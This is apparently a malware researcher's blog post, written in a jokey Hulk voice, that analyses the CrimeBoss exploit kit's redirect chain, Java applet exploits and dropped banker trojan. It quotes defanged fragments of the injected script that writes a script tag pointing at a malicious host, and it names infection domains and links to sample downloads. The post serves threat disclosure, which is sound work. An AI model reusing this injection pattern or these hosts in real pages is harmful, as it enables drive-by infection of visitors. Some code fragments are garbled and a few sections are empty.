Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php)27 Jan 2013
On a cold January night we find The Hulk passing time surfing the internet
Why can't puny malware just leave Hulk alone????!!!
The script on abrahamspath.org.uk/cb.php checks if Java is enabled(slightly
sanitized with <):if(navigator.javaEnabled())If Java is enabled you are sent via a 302 redirect to
＜/script＞'); }boyssuitsonline、com/jex/index.php?setup=dwhere again a check for Java is made (slightly sanitized with <):if(navigator.javaEnabled())Finally the victim is presented with the actual landing page, Landing page sample is here -->>[PASTEBIN]The landing page again checks if Java is enabled.
document.write('＜sc' + 'ri' + 'pt src=
"h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 +
＜/sc' + 'ri' + 'pt＞');
[NEW] Analysis of Landing Page & Jars exploit usedI analyzed how the exploit worked, and noted it down. Is a bit long so I wrote it in seperate post page-->>[HERE] What is it with these moronz?? A malware PE binary rh.exe is downloaded from patuamusic.com,br/app/ if any of the Java applets successfully exploit the victim. See: VirusTotal analysis -->>[HERE]malwr.com analysis -->>[HERE] Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/ This is actually another executable and appears to be a banker trojan. See: VirusTotal analysis -->>[HERE]malwr.com analysis -->>[HERE]
Infection SchemeBelow we added the infection scheme graph: RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!
PoC is as per below:
And so many other infections:
Research, Sources & Samples
Samples as per above sample pic, can be received here -->>[MEDIAFIRE]
Recent Infection URL of this Exploit Kit is here -->>[HERE]
Similar analysis in Japanese --->>[HERE]
The Regex to search infection hint:
Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)